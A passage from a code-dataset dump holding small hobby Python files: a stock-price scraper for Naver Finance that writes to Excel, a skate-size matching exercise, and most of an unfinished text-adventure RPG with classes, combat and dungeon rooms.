[i.replace(\"certification\", \"\") for i in courses]\r\nlem = pd.Series(lem)\r\nab = pd.concat([lem, data['Content (Reviews and Tweets)']], axis = 1)\r\nab.to_csv('cleaned_words.csv')\r\n\r\n","repo_name":"Mritunjay1729/HH-Internships","sub_path":"finalSentimentalAnalysis.py","file_name":"finalSentimentalAnalysis.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"13267935305","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport openpyxl\r\n\r\nfpath = r'C:\\Users\\o9707\\Desktop\\대학교\\inflearn\\crawling\\기본편\\02.네이버_주식현재가\\참가자_data.xlsx'\r\nwb = openpyxl.load_workbook(fpath)\r\nws = wb.active # 현재 활성화된 시트 선택(기본시트)\r\n\r\ncodes = [\r\n '005930',\r\n '000660',\r\n '035720',\r\n]\r\n\r\nrow = 4\r\nfor code in codes:\r\n url = f\"https://finance.naver.com/item/sise.naver?code={code}\"\r\n response = requests.get(url)\r\n html = response.text\r\n soup = BeautifulSoup(html, 'html.parser')\r\n price = soup.select_one(\"#_nowVal\").text\r\n price = price.replace(',','')\r\n print(f\"code : {code}, price : {price}\")\r\n ws[f'A{row}'] = int(price)\r\n row +=1\r\n\r\nwb.save(fpath)","repo_name":"osm8485/Crawling_study","sub_path":"기본편/02.네이버_주식현재가/04.주식현재가 크롤링.py","file_name":"04.주식현재가 크롤링.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10648270734","text":"n = int(input('Кол-во коньков: '))\nskates = []\n\nfor i in range(n):\n print('Размер', i + 1, 'пары:', end=' ')\n skate_size = int(input())\n skates.append(skate_size)\n\nk = int(input('\\nКол-во людей: '))\npeople = []\n\nfor j in range(k):\n print('Размер ноги', j + 1, 'человека:', end=' ')\n foot_size = int(input())\n people.append(foot_size)\ncount = 0\n\nfor i_people in people:\n for j_skates in range(len(skates)):\n if skates[j_skates] >= i_people:\n skates.remove(skates[j_skates])\n count += 1\n break\n\nprint('\\nНаибольшее кол-во людей, которые могут взять ролики: ', count)\n","repo_name":"StanleyOspin/Python_Basic","sub_path":"Module16/07_roller_skates/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"43905531511","text":"\nimport random\nimport time\nfrom enum import Enum\n#ToDo - write a CAPS program to capitalize all input so that it doesn't matter how they enter their name or make things one letter to select. \n#ToDo - Make validators into functions, make input into function with min and max acceptance stuff\n#ToDo - Turn hpPotions into a bonus life in combat \nWeapon = Enum(\"Weapon\", \"Longsword, Warhammer, Spear\")\nSpell = Enum(\"Spells\", \"Fireball, IceStorm, LightningBolt\")\nTool = Enum(\"Tools\", \"Lockpick, GrapplingHook, \" )\nShield = Enum(\"Defense\",\"Shield, ChainMail, Cloak\")\nResistance = Enum(\"Resistance\",\"MagicShield, RingOfProtection, Counterspell\")\nWeapons = {}\nSpells = {}\nTools = {}\nShields = {}\nResistances = {}\nWeapons[\"Fist\"] = {\"Name\": \"Fist\", \"dmgBonus\": 2, \"dmgType\": \"Bludgeoning\"}\nWeapons[\"BatFist\"] = {\"Name\": \"BatFist\", \"dmgBonus\": 50, \"dmgType\": \"Kill\"}\nWeapons[\"TrollMace\"] = {\"Name\": \"TrollMace\", \"dmgBonus\": 20, \"dmgType\": \"Bludgeoning\"}\nWeapons[\"Longsword\"] = {\"Name\": \"Longsword\",\"dmgBonus\": 5, \"dmgType\": \"Slashing\"}\nWeapons[\"Warhammer\"] = {\"Name\": \"Warhammer\",\"dmgBonus\": 5, \"dmgType\": \"Bludgeoning\"}\nWeapons[\"Spear\"] = {\"Name\": \"Spear\",\"dmgBonus\": 5, \"dmgType\": \"Piercing\"}\nWeapons[\"ObsidianEdge\"] = {\"Name\": \"Obsidian edge\",\"dmgBonus\": 15, \"dmgType\": [\"Slashing\", \"Fire\"]}\nSpells[\"Fireball\"] = {\"Name\": \"Fire ball\",\"dmgBonus\": 10, \"dmgType\": \"Fire\"}\nSpells[\"IceStorm\"] = {\"Name\": \"Ice storm\",\"dmgBonus\": 10, \"dmgType\": \"Cold\"}\nSpells[\"LightningBolt\"] = {\"Name\": \"Lightning bolt\",\"dmgBonus\": 15, \"dmgType\": \"Lightning\"}\nSpells[\"EclipticBeam\"] = {\"Name\": \"Ecliptic beam\",\"dmgBonus\": 35, \"dmgType\": \"Dark\"}\nSpells[\"NoMagic\"] = {\"Name\": \"No Magic for you\", \"dmgBonus\": 2, \"dmgType\": \"Bad\"}\n\ndef checkForDead():\n if player.hp <= 0 and player.hpPotions > 0:\n print(\"Thankfully just as you're about to fall you manage take a swig of that potion you found. Returning some hp.\")\n player.hp = player.hp + .5 * player.maxhp\n elif player.hp <= 0:\n print(\"You Have Died\")\n print(\"Play again? y/n\")\n userInput = input()\n if userInput == \"y\":\n playeracterSelect()\n else:\n quit()\n else:\n pass\n\ndef levelUp():\n if player.xp >= 10 * player.lvl:\n player.xp -= 10 * player.lvl\n increases = 0\n print(\"Level up!\")\n player.maxhp += 10\n player.lvl += 1\n calcStats()\n printStats()\n print(\"Choose two stats to increase by 2\")\n ##stats = [\"strength\",\"dexterity\",\"constitution\",\"intelligence\",\"wisdom\"] <- in case some particular slimmer code doesn't work\n print(f\"1: Strength\")\n print(f\"2: Dexterity\")\n print(f\"3: Constitution\")\n print(f\"4: Intelligence\")\n print(f\"5: Wisdom\")\n while increases < 2:\n print(\"Type the number of the stat you wish to increase\")\n userChoice = int(input())\n if userChoice == 1:\n player.strength +=2\n print(\"Strength + 2!\")\n increases += 1\n elif userChoice == 2:\n player.dexterity +=2\n print(\"Dexterity + 2!\")\n increases += 1\n elif userChoice == 3:\n player.constitution +=2\n print(\"Constitution + 2!\")\n increases += 1\n elif userChoice == 4:\n player.intelligence +=2\n print(\"Intelligence + 2!\")\n increases += 1\n elif userChoice == 5:\n player.wisdom +=2\n print(\"Wisdom + 2!\")\n increases += 1\n else:\n print(\"please enter a number 1-5\")\n calcStats()\n player.hp = player.maxhp\n print(\"You feel invigorated by your level up. Health restored!\")\n levelUp()\n else:\n pass\n#toDo - Make a printStats functions to display stats, and a calcStats to reintialize stats\ndef calcStats():\n player.conModifier = player.constitution/10\n player.maxhp = player.maxhp*player.conModifier\n if player.race == \"Warrior\":\n player.dmg = 10 + player.strength + player.weapon[\"dmgBonus\"]\n player.dmgType = player.weapon[\"dmgType\"]\n elif player.race == \"Rogue\":\n player.dmg = 10 + player.dexterity + player.weapon[\"dmgBonus\"]\n player.dmgType = player.weapon[\"dmgType\"]\n elif player.race == \"Wizard\":\n player.dmg = 10 + player.intelligence + player.spell[\"dmgBonus\"]\n player.dmgType = player.spell[\"dmgType\"]\n player.critMultiplier = player.dexterity/5\n\ndef printStats():\n print(f\"\"\"\n\n Adventurer:{player.name} the lvl {player.lvl} {player.race}\n\n Max HP:{player.maxhp} -- How many hits you can take\n\n Strength: {player.strength} -- Affects warrior dmg and your ability to complete tasks of heft\n\n Dexterity:{player.dexterity} -- Affects rogue dmg and your ability to complete mobility based feats and increases your crit dmg\n\n Constitution:{player.constitution} -- Affects your max HP and resistance to some attacks\n\n Intelligence:{player.intelligence} -- Affects wizard dmg and understanding of things\n\n Wisdom:{player.wisdom} -- Affects perception and noticing secrets\n\n Weapon:{player.weapon['Name']} -- Affects your dmg type and amount\n\n Shield:{player.shield} -- Blocks physical damage\n\n Tool:{player.tool} -- Situational items\n\n Spell:{player.spell['Name']} -- Decides damage type and power of the mage, some noncombat use\n\n Resistance:{player.resistance} -- Provides blocking power against magic\n\n Damage:{player.dmg} -- Base damage before rolls and calculations, decided by your main stat\n\n Damage Type:{player.dmgType} -- Decided by your main method of attack, some enemies are weaker or stronger against specific types of dmg\n\n XP:{player.xp} -- Counts experience total until next level up, XP requirement is your level * 10\n\n Damage Stop:{player.dmgStop} -- Blocks a flat amount of damage, provided by advanced defensive items\n\n Damage Bonus:{player.dmgBonus} -- Additional damage added onto your base before calculations, added by your weapon or spell\n\n Constitution Modifier:{player.conModifier} -- Your constitution/10, multiplies into your max hp\n\n Crit Multiplier:{player.critMultiplier} -- Your dexterity/5, increases your critical hit damage mildly increases likelihood\n \"\"\")\n \n#Should allow players to select their class, altering their base stats and equipment.\nclass char:\n def __init__(self, race, name, hp, strength, dexterity, constitution, intelligence, wisdom,):\n self.name = name \n self.race = race\n self.maxhp = hp\n self.hp = hp\n self.strength = strength\n self.dexterity = dexterity\n self.constitution = constitution\n self.intelligence = intelligence\n self.wisdom = wisdom\n self.weapon = Weapons[\"Fist\"] \n self.shield = None \n self.tool = None \n self.spell = Spells[\"NoMagic\"]\n self.resistance = None \n self.dmg = 10\n self.dmgType = None\n self.xp = 0 \n self.dmgStop = 0 \n self.dmgBonus = 0\n self.lvl = 1\n self.conModifier = self.constitution/10\n self.maxhp = self.maxhp*self.conModifier\n self.critMultiplier = self.dexterity/5\n self.hpPotions = 0\n## toDo - write a simple level up function that checks xp and then allows them to choose some stat increases and increases their HP\n## toDo - make a calculate function that adds up damage and stats before fights to make things more progressive, con is a modifier to HP\n## toDo - make it so weapons affect your dmg bonus, not dmg and thus don't stack\n def __str__(self):\n return f\"{self.race}{self.weapon}{self.shield}{self.tool}{self.spell}{self.resistance}{self.dmgType}{self.name}()\"\n def selectThings(self):\n if self.race == \"Warrior\":\n weapons = [f\"{weapon.value}-{weapon.name}\" for weapon in Weapon]\n weapons = \", \".join(weapons[:-1]) + \" or \" + weapons[-1]\n choice = int(input(f\"Choose your weapon {weapons}: \"))\n self.weapon = Weapon(choice)\n if self.weapon == Weapon.Warhammer:\n self.weapon = Weapons[\"Warhammer\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n if self.weapon == Weapon.Longsword:\n self.weapon = Weapons[\"Longsword\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n if self.weapon == Weapon.Spear: \n self.weapon = Weapons[\"Spear\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n shields = [f\"{shield.value}-{shield.name}\" for shield in Shield]\n shields = \", \".join(shields[:-1]) + \" or \" + shields[-1]\n choice = int(input(f\"Choose your shield {shields}: \"))\n self.shield = Shield(choice)\n self.dmg += self.strength\n print(\"You're stronging, Sir\")\n\n elif self.race == \"Wizard\":\n spells = [f\"{spell.value}-{spell.name}\" for spell in Spell]\n spells = \", \".join(spells[:-1]) + \" or \" + spells[-1]\n choice = int(input(f\"Choose your weapon {spells}: \"))\n self.spell = Spell(choice)\n if self.spell == Spell.Fireball: \n self.spell = Spells[\"Fireball\"]\n self.dmgType = self.spell[\"dmgType\"]\n if self.spell == Spell.IceStorm:\n self.spell = Spells[\"IceStorm\"]\n self.dmgType = self.spell[\"dmgType\"]\n if self.spell == Spell.LightningBolt:\n self.spell = Spells[\"LightningBolt\"]\n self.dmgType = self.spell[\"dmgType\"]\n resistances = [f\"{resistance.value}-{resistance.name}\" for resistance in Resistance]\n resistances = \", \".join(resistances[:-1]) + \" or \" + resistances[-1]\n choice = int(input(f\"Choose your shield {resistances}: \"))\n self.resistance = Resistance(choice)\n self.dmg += self.intelligence\n print(\"May your magic burn bright\")\n\n elif self.race == \"Rogue\":\n weapons = [f\"{weapon.value}-{weapon.name}\" for weapon in Weapon]\n weapons = \", \".join(weapons[:-1]) + \" or \" + weapons[-1]\n choice = int(input(f\"Choose your weapon {weapons}: \"))\n self.weapon = Weapon(choice)\n if self.weapon == Weapon.Warhammer:\n self.weapon = Weapons[\"Warhammer\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n if self.weapon == Weapon.Longsword:\n self.weapon = Weapons[\"Longsword\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n if self.weapon == Weapon.Spear: \n self.weapon = Weapons[\"Spear\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n tools = [f\"{tool.value}-{tool.name}\" for tool in Tool]\n tools = \", \".join(tools[:-1]) + \" or \" + tools[-1]\n choice = int(input(f\"Choose your tool {tools}: \"))\n self.tool = Tool(choice)\n self.dmg += self.dexterity\n print(\"Happy hunting\")\n \n#same as the above character template but for monsters, much shorter\nclass monster:\n def __init__(self, name, hp, damage, weakness, blockedBy, xp):\n self.name = name\n self.hp = hp\n self.damage = damage\n self.weakness = weakness\n self.blockedBy = blockedBy \n self.xp = xp\n def __str__(self):\n return f\"{self.name}{self.weakness}{self.blockedBy}()\"\n \n #First attempts at making a combat system, make dmg a variable thats set in classes and then modified based off of stats.Give weapons a strength to match weaknesses \n #Based on a combat system that I saw on stack overflow. Works a bit differently and is expanded but that's where I got the general form of it. \n #Potentially have weakness and resistance be dictionarys and use the check for key function with the input of the players dmg to check\nclass combat:\n def __init__(self):\n calcStats()\n self.round = 0\n self.gameOver = False\n self.playerDmg = 0\n self.opponentDmg = 0 \n def newRound(self):\n self.round += 1\n print(f\"\\n*** Round: {self.round} ***\\n\") \n def checkWin(self,player, opponent):\n if opponent.hp <= 0:\n self.gameOver = True\n print(\"You win\")\n player.xp += opponent.xp \n elif player.hp <= 0:\n print(\"You have died\")\n quit()\n def takeTurn(self,player,opponent):\n roll = random.randint(1,20)\n self.playerDmg = 0 \n roll += player.dexterity/5 \n if player.dmgType == opponent.weakness:\n print(\"Your dmg type seems particularly strong against this monster, roll + 5!\")\n roll += 5 \n if roll >= 20:\n print(f\"You rolled a {roll} for attacking\")\n self.playerDmg = (player.dmg + random.randint(1,10))*player.critMultiplier\n self.playerDmg = round(self.playerDmg)\n opponent.hp = opponent.hp - self.playerDmg\n print(\"\\033[1;31;40m POWER LEVELS OVER 9000!!!\\033[0m\") \n elif roll >= 15:\n print(f\"You rolled a {roll} for attacking\")\n self.playerDmg = (player.dmg + random.randint(1,10))*(player.critMultiplier/2)\n self.playerDmg = round(self.playerDmg)\n opponent.hp = opponent.hp - self.playerDmg\n print(f\"Critical Hit!\")\n elif roll < 10:\n print(f\"You rolled a {roll} for attacking\")\n print(\"you missed!\")\n else:\n print(f\"You rolled a {roll} for attacking\")\n self.playerDmg = (player.dmg+ random.randint(1,10))\n self.playerDmg = round(self.playerDmg)\n opponent.hp = opponent.hp - self.playerDmg\n print(f\"You land a hit\")\n def monsterTurn(self,player,opponent):\n roll = random.randint(1,20)\n if player.resistance == opponent.blockedBy or player.shield == opponent.blockedBy:\n print(\"Your defenses seem particularly strong against this creature, roll + 5!\")\n roll += 5 \n if roll >= 15:\n print(f\"You rolled a {roll} for defense \") \n print(\"\\033[32mTanked that hit like a boss\\033[0m\")\n self.opponentDmg = ((opponent.damage + random.randint(1,10))/2) - player.dmgStop\n player.hp = player.hp - self.opponentDmg\n else:\n print(f\"You rolled a {roll} for defense \") \n print(\"You take a solid hit\")\n self.opponentDmg = ((opponent.damage + random.randint(1,10))) - player.dmgStop\n player.hp = player.hp - self.opponentDmg \n def displayResult(self,player,opponent):\n if player.race == 'Wizard': \n print(f\"{player.name} blasted a {player.spell['Name']} at {opponent.name} it dealt {self.playerDmg} {player.dmgType} dmg.\")\n print(f\"{opponent.name} attacked {player.name} they dealt {self.opponentDmg} dmg\")\n print(f\"{opponent.name} hp:{opponent.hp}\")\n print(f\"{player.name} hp:{player.hp}\")\n else:\n print(f\"{player.name} used a {player.weapon['Name']} on {opponent.name} it dealt {self.playerDmg} {player.dmgType} dmg.\")\n print(f\"{opponent.name} attacked {player.name} they dealt {self.opponentDmg} dmg\")\n print(f\"{opponent.name} hp:{opponent.hp}\")\n print(f\"{player.name} hp:{player.hp}\")\n \ndef playeracterSelect():\n print(\"Let's start with your name: \") \n name = input() \n print(\"Good luck, \" +name+ \".\") \n classes = [\"w\",\"r\",\"z\"]\n print(\"Next we'll need your class. What kind of adventure are you?\")\n userInput = \"\"\n global player\n player = ()\n while userInput not in classes:\n print(\"Options: (r)ogue/(w)arrior/wi(z)ard\")\n userInput = input()\n if userInput == \"r\":\n player = char('Rogue', name, 100, 10, 18, 12, 14, 16)\n player.selectThings()\n playerStart()\n elif userInput == \"z\":\n player = char('Wizard', name, 75, 8, 10, 10, 22, 14)\n player.selectThings()\n playerStart()\n elif userInput == \"w\":\n player = char('Warrior', name, 125, 18, 14, 14, 8, 10) \n player.selectThings()\n playerStart()\n else: \n print(\"Please enter a valid option.\")\n\ndef playerStart():\n actions = [\"l\",\"r\",\"f\"]\n print(\"You begin in a dusty room made of cobbled stone. There are 3 paths.\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (l)eft/(r)ight/(f)orward\")\n userInput = input()\n if userInput == \"f\":\n ghoulGames()\n elif userInput == \"r\":\n longHallway()\n elif userInput == \"l\":\n trollBridge()\n else: \n print(\"Please enter a valid option.\")\n\n#First room that you find by going forwards. Requires a stat check to pass the course\n#if they opt to fight or fail the course it initiates combat with the ghoul\n#upon completeing the games playeracters with a high wis stat can find a secret room\n \ndef ghoulGames():\n actions = [\"p\",\"f\",\"t\"]\n print(\"Welcome young\",player.race,\"to the Ghoul Games. Announces an undead ringmaster\")\n print(\"To escape my room you must prove your worth in my obstacle course\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (p)lay along/(f)ight the ghoul/(t)urn and run\")\n userInput = input()\n if userInput == \"f\":\n vsGhoul() \n elif userInput == \"p\":\n if player.dexterity >= 16 or player.strength >= 16:\n print(\"Thanks to your athletcism you manage to duck, dodge, and weave through the obstacles\")\n print(\"'Well done young \",player.race,\" take this amulet as a testament to your feat' exclaims the Ringmaster before vanishing into a mist\")\n print(\"As you don the amulet you feel a sharp burst of magical energy course through you, making you faster\")\n player.dexterity = player.dexterity + 2\n player.wisdom = player.wisdom + 2\n if player.wisdom < 18:\n print(\"A single door opens on the left wall of the room\")\n input(\"press enter to continue\")\n longHallway()\n else:\n print(\"While you do notice a door open to the left that seems too obvious a route for catacomb such as this.\")\n print(\"Your trained eyes, now heightened by the amulet, notice the seems of a small trapdoor below the ringmaster.\")\n print(\"Unable to resist the same curiosity that brought you deep underground you slip into the hatch, barely able\")\n print(\"to hear the ringmaster's cries of protest behind you\")\n input(\"press enter to continue\")\n treasureRoom()\n else:\n print(\"You make it part way through the course but you lose your grip on a rope and fall\")\n print(\"partially into a pool of lava, singeing your leg\")\n print(\"'Bah, what a poor showing. You must die for wasting my audience's valuable time'\")\n player.hp = player.hp - 15\n checkForDead()\n vsGhoul() \n elif userInput == \"t\":\n print(\"You find the door has slammed closed behind you\")\n ghoulGames()\n else: \n print(\"Please enter a valid option.\")\n \n#First combat, player fights the ghoul and either dies or gains access to long hallway or treasure room\n\ndef vsGhoul():\n actions = [\"t\",\"d\"]\n print(\"hohoho, I see you have chosen death, young adventurer.\")\n ghoul = monster('ghoul', 225, 8, 'Fire', Resistance, 10 )\n currentCombat = combat() \n input(\"Press enter to continue \")\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,ghoul)\n currentCombat.monsterTurn(player,ghoul)\n currentCombat.displayResult(player,ghoul)\n currentCombat.checkWin(player,ghoul)\n input(\"Press enter to continue\")\n levelUp()\n print(\"\"\"As the ghoul dies he drifts apart into whisps \"Beware the beast that lays within, you don't know the powers you play with\" \"\"\")\n print(\"\"\"\n A small hatch pop open from underneath where the ghost died. You think you can see treasure down there but you're not too sure.\n You also notice a door off to the side that looks much less rewarding, but also much less ominous.\n \"\"\")\n print(\"Options: small (t)rapdoor/(d)oorway \")\n userInput = \"\"\n while userInput not in actions:\n userInput = input()\n if userInput == \"d\":\n longHallway()\n elif userInput == \"t\":\n treasureRoom()\n else:\n print(\"please enter a valid option\")\n \ndef treasureRoom():\n actions = [\"s\", \"a\", \"w\"]\n print(\"\"\"\n As you duck down into the trapdoor you're greeted by luminescent piles of gold, amongst which you spy \n multiple magic weapons. You get the feeling that these are powerful enough that you can probably only handle using one of them.\n There's a a jagged and cruel looking sword cut from obsidian, some well crafted dwarven platemail, and a steel wand inlayed with \n saphires all resting on pedestals.\n \"\"\")\n userInput = \"\"\n while userInput not in actions:\n userInput = input(\"Options: Take (s)word/Take (a)rmor/Take (w)and\")\n ending = \"Taking your newfound item you travel through a plain wood door at the end of the room, deeper into the catacombs.\"\n if userInput == \"s\":\n print(\"\"\"\n As you grasp the hilt the hilt of the black stone blade you feel infernal strength race through you. You feel both stronger and as though you \n would take less damage from fire.\n \"\"\")\n player.resistance = 'Fire'\n player.weapon = Weapons[\"ObsidianEdge\"]\n player.strength += 5\n player.dexterity += 2 \n calcStats()\n print(ending)\n dungeon() \n elif userInput == \"a\":\n print(\"\"\" \n Picking up the heavy suit of armor feels like a momentous task, let alone donning it. Thankfully, after some manuevering you manage to get it on\n you definately feel like regardless of whats attacking you this will help prevent damage. \n \"\"\")\n player.dmgStop = 5\n print(ending)\n dungeon()\n elif userInput == \"w\":\n print(\"\"\" \n As you pick up the wand you feel a jolt of electricity course through you, your senses seem to be moving faster. \n or at least everything else seems slower. Your magic feels more powerful as well \n \"\"\")\n player.wisdom += 4\n player.intelligence += 4\n calcStats()\n print(ending)\n dungeon()\n else:\n print(\"please enter a valid option\")\n \ndef trollBridge():\n actions = [\"a\",\"f\",\"t\", \"j\"]\n print(\"\"\"\n As you wander the tunnels you find and step through a door into large chamber with a chasm nearly 20 ft across in the middle, thankfully there's a well built stone bridge crossing it.\n The only issue is that there's a lorge troll standing in the middle of the bridge, munching on an apple. 'Why hello there little one, you must want to be exploring of the dungeon, yes? \n I'm sorry to say that I only let people who answer my riddle pass' declares the troll. \n While he doesn't seem particularly hostile the troll is quite large and has what appears to be a large mace sitting next to him. \n \"\"\")\n\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (a)nswer/(f)ight/(t)urn back/(j)ump across\")\n userInput = input()\n if userInput == \"a\":\n print(\"\"\"'Ohh yes, this is very good, it's been a long time since something so living and fleshy wanted to talk to me. Here's the riddle:\n My life can be measured in hours,\n\n I only serve to be devoured.\n\n Slim, I am quick.\n\n Fat, I am slow.\n\n Wind is my foe.\n \n What am I?\n\n It's really good isn't it? I came up with it myself!'\n \"\"\")\n playerAnswer = \"\"\n answer = \"candle\"\n attempts = 0\n print(\"So anyways, I will need an answer if imma let you pass. Because it's been s long since I've seen anyone I'll give you 3 tries(answer in lowercase)\")\n while answer not in playerAnswer:\n print(f\"You have {3 - attempts} remaining little one\")\n playerAnswer = input()\n if answer not in playerAnswer:\n print(\"Sorry, but that's not it\")\n attempts += 1 \n if attempts == 2:\n print(\"you have one more try, make it a good one \")\n elif attempts == 3:\n print(\"Oh well, we can't all be as smart as me I suppose\")\n trollFight()\n \n## toDo - Make an option to double down for a reward\n print(f\"'Oh excellent, so well done little {player.race}. Here, you may cross my bridge' the troll steps aside and lets you pass\")\n print(\"As you turn away from the troll and continue down the passage the air thickens and you think you hear voices ahead\")\n player.intelligence += 2\n print(\"Player intelligence + 2!\")\n input(\"press enter to continue\")\n cultGathering() \n elif userInput == \"j\":\n print(\"You decide that you'd rather trust your own athleticism than the word of a troll or his bridge\")\n if player.strength >= 20 or player.dexterity >= 20:\n print(\"You make a running jump and manage to sail over the chasm. Tucking into a roll on the other side you rapidly pop to your feet.\")\n print(\"The troll turns around 'Oh ho, I see. Well aren't you quite the individual, don't even need my bridge. Perhaps you could could actually survive what lay ahead.\")\n print(\"As you turn away from the troll and continue down the passage the air thickens and you think you hear voices ahead\")\n input(\"press enter to continue\")\n cultGathering() \n else:\n print(\"\"\"\n Unfortunately you overestimated you abilities and while you do make a running jump you realize all too late that you aren't going to make it.\n You tumble down into the darkness.\n \"\"\")\n player.hp -= 40\n checkForDead()\n ## toDo - make a race system that gives abilities and stats\n print(\"Thankfully you were in good enough shape to survive the fall. You slowly come to crumpled in the dark on cobbles wet with your blood\")\n time.sleep(2)\n dungeon()\n elif userInput == \"f\":\n print(\"You draw your breath and prepare for battle hopeing to get the first strike in before the eventual battle.\")\n trollFight()\n elif userInput == \"t\":\n print(\"You find the door has slammed closed behind you\")\n trollBridge()\n else: \n print(\"Please enter a valid option.\")\n trollBridge()\n \n\ndef trollFight ():\n troll = monster('troll', 400, 12, ['Fire','Slashing'], Shields, 25)\n actions = [\"c\", \"e\", \"p\"]\n currentCombat = combat()\n input(\"Press enter to continue \")\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,troll)\n currentCombat.monsterTurn(player,troll)\n currentCombat.displayResult(player,troll)\n currentCombat.checkWin(player,troll)\n input(\"Press enter to continue\")\n levelUp()\n print(\"\"\"\n The troll crashes to the ground, dropping his mace, deafeated. You see the yawning passsage way beyond the bridge is dimly lit and appears to almost be\n leaking darkness into the rest of the room. With the door locked behind you the only other option seems to be down the pit beneath the bridge. There's a well worn \n rope tied to the edge that you could maybe shimmy down, but it would be very difficult. If only you had something like a grappling hook to tie up here.... Also, the trolls mace rests heavily on the ground. It's incredibly massive but you\n could try to lift it...\n \"\"\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (c)limb down/(e)nter the cave/(p)ickup the mace\")\n userInput = input()\n if userInput == \"c\":\n if player.dexterity >= 20 or player.strength >= 24:\n print(\"You nimbly wind your way down the threadbare rope into the darkness\")\n dungeon()\n elif \"GrapplingHook\" in player.tools:\n print(\"Thankfully you came prepared. You tie the grapple up here and descend into the darkness\")\n dungeon()\n else:\n print(\"Unfortunately your hands slip and you lose grip on the rope, tumbling into the dark.\")\n player.hp = player.hp - 30\n dungeon()\n elif userInput == \"e\":\n cultGathering()\n elif userInput == \"p\":\n if player.strength >= 22:\n print(\"Thanks to your absolute immensity you manage to heave the mace over your shoulder. This thing probably deals some serious damage\")\n player.weapon = Weapons[\"TrollMace\"]\n print(\"Options: (c)limb down/(e)nter the cave\")\n playerAnswer = input()\n if playerAnswer == \"c\":\n dungeon()\n elif playerAnswer == \"e\":\n cultGathering()\n else:\n print(\"please enter a valid option\")\n else:\n print(\"You find that you can barely budge the mace, let alone lift it. Sadge.\")\n userInput = \"\"\n else:\n print(\"please enter a valid option\")\n\ndef longHallway(): \n actions = [\"a\",\"i\",\"t\"]\n print(\"You step into a long hallway, dimly lit and dank. The walls seems to covered in a scrawl that looks like a language, though not one that you know\")\n print(\"At the end of the hallway you see a tall door carved of ebony.\")\n print(\"The door is covered in latches and locks on your side... meaning there must have been, or may still be, something trapped in there\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (a)pproach the door/(i)nvestigate the walls/(t)urn and run\")\n userInput = input()\n if userInput == \"a\":\n print(\"\"\"\n As you walk down the hallway you can't help but feel like the air clings to you in an unnatural way,\n making the air itself feel thick and oily. Upon reaching the door you realize it's even larger than you initially thought.\n The door is easily over 9ft tall and the locks are rusted over. Theres a series of claw marks on the sarrounding floor and walls. \n \"\"\")\n print(\"Options: (o)pen the door/(b)ack away\")\n choices = [\"o\",\"b\"]\n choice = input()\n while choice not in choices:\n if choice == \"o\":\n print(\"You slowly unlock the old rusty locks, grinding the bolts in their grooves. The tall door swings open with an unnatural silence.\")\n denOfTheBeast()\n elif choice == \"b\":\n longHallway()\n else:\n print(\"please enter a valid option\")\n \n\n elif userInput == \"i\":\n print(\"\"\"\n As you approach the wall you begin to hear whispering from the edges of your vision, \n it's almost as though some unseen force is laughing at you. Now that the writing comes into focus it takes\n nearly all your willpower to to stay focused on the swirling caligraphy of the text as the laughing gets louder.\n It's beginning to sound like you yourself are also laughing.\n \"\"\")\n if player.intelligence >= 18:\n print(\"\"\"\n Thankfully because of your rigorous mental training you find yourself able to fight through the laughter and find your own mental voice.\n You make out the text \"Here, imprisoned, lies Krushok, Firstborn Tyrant of the Moon\" underneath seems to be inscribed some kind of spell that you\n can copy down.\n \n \"Ecliptic beam\" \n \"\"\")\n player.spell = Spells[\"EclipticBeam\"]\n userInput =\"\"\n longHallway()\n else:\n print(\"\"\"\n As you get within range of touching the wall the voices grow so loud that they begin to drown out your thoughts\n until all you can experience is the mania that rolls over you. You stumble into the wall and hit your head on the stone, knocking yourself out.\n When you come too it the wall seems perfectly mundane and you can't see any writing. You feel like a bit of your sanity has been crippled. But, perhaps, you gained a bit of knowledge. \n As you walk away from the wall you begin to hear the whispers again...\n \"\"\")\n player.wisdom = player.wisdom - 2\n player.intelligence = player.intelligence + 1\n player.hp = player.hp - 10\n input(\"Press enter to continue\")\n longHallway()\n elif userInput == \"t\":\n print(\"You turn and exit the way you came\")\n playerStart()\n else:\n print(\"Please enter a valid option\")\n\n## toDo - denOfTheBeast, dungeon, cultGathering -- dungeon should have chest that requires rogue tools\n## toD0 - Make list of weapons into a dictionary so I can jsut add new weapons with new types whenever and have it be easier(done)\n## toDo - made weaknesses into a list instead of just one input. see if that breaks everything??(It sort of does)\ndef dungeon():\n actions = [\"h\", \"i\", \"c\"]\n chestUnlocked = False\n userInput = \"\"\n print(\"\"\" \n You find yourself in the middle of what could only be a dungeon. The ceiling is caved in, allowing for a trickle of light from above. Softly illuminating a dank passageway \n lined with the iron bars of prison cells, that continues long into the dark. In one of the cells you see an ironbound chest, but you're not sure you can brute force these\n bars or this chest. Another cell seems to have a prisoner hanging by chains. The bedraggled figure dangles from their wrists, barely alive.\n From further ahead you hear breath. Breath that echoes between the walls and leaves your mind feeling empty, a deep and primal rasp. Something is sleeping.\n \"\"\")\n while userInput not in actions:\n print(\"Options: (h)elp prisoner/(i)nvestigate chest/(c)ontinue down\")\n userInput = input() \n if userInput == \"h\":\n prisonerOptions = [\"h\", 